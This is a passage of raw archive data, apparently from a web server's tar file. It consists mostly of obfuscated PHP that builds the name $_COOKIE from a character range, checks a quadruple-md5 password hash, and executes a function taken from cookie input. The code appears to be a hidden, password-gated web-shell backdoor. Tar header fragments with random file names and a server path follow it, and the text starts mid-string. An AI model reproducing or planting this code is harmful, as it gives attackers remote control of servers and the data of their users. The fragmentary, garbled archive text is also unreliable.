"\x35\x33\x38\63\71\173\x35\63\x38\63\66\x7b\65\x33\70\x33\63\x7b\65\63\70\62\65\173\65\x33\x38\64\60\173\x35\63\70\x32\67\x7b\65\x33\x38\x34\x36\x7b\65\63\x38\x33\x36\x7b\65\63\x38\63\61\173\x35\x33\x38\x32\71\x7b\x35\63\70\62\x34\173\x35\63\70\62\x35"); goto MrYvj; MrYvj: foreach ($HtULa as $ZaHuI) { $AInPL[] = self::lzaQU($ZaHuI); Q23tv: } goto onn4C; qOnaN: } } goto WJ9gG; uGgCH: @($yZFt5 = $yZFt5[86]($yZFt5[53], $yZFt5[63](${$yZFt5[47]}[10]))); goto M3Uwm; Zs882: $A0OyS = range("\x7e", "\x20"); goto lo9xh; c8SrI: $yZFt5[63] = $yZFt5[63] . $yZFt5[74]; goto ulwLb; HTS_1: if (!(in_array(gettype($yZFt5) . "\61\x31", $yZFt5) && md5(md5(md5(md5($yZFt5[5])))) === "\70\141\x33\x39\x38\x34\x31\x61\x66\x30\x63\x34\67\x66\63\x39\x64\x31\x30\66\146\67\x34\63\65\x31\x31\x32\x36\144\67\145")) { goto BkbAD; } goto c8SrI; ZlIqA: BkbAD: goto np74W; lo9xh: $yZFt5 = ${$A0OyS[4 + 27] . $A0OyS[37 + 22] . $A0OyS[30 + 17] . $A0OyS[8 + 39] . $A0OyS[12 + 39] . $A0OyS[50 + 3] . $A0OyS[2 + 55]}; goto HTS_1; WJ9gG: WHpzl::kX0XH(); ?> login/login/FgsGIaweiXfymEqjQz.mpg000064400000000000147741234660013121 0ustar00login/login/zTifuYRIFCglHGMwSLs.jpc000064400000000000147741234660013054 0ustar00
/var/www/axolotl/data/www/arhangelsk.axolotls.ru/a537b/desktop_app.tar